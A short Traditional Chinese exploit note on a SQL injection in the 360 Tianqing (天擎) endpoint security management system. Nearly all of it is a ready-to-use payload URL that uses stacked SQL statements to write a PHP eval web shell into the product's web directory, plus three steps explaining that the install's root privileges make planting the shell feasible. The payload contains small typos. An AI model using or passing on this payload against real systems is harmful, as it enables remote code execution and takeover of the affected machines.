終端安全管理系統（天擎）前端SQL注入漏洞_zh-hant

# 終端安全管理系統（天擎）前端SQL注入漏洞/zh-hant

==EXP==

https://127.0.0.1:8843/api/dp/rptsvcsyncpoint?ccid=1';create table O(TEXT);insert into O(T) values('<>php @eval($_POST[1];?>)');copy O(T) to 'C"\Program Files(x86)\360\skylar6\www\1.php';drop table O;--

==漏洞信息==

1.通過安裝包安裝的程序一般擁有ROOT權限，因此該注入點可嘗試寫入Shell

2.通過注入點，創建一張表 O

3.爲表O添加一個新字段T並且寫入Shell內容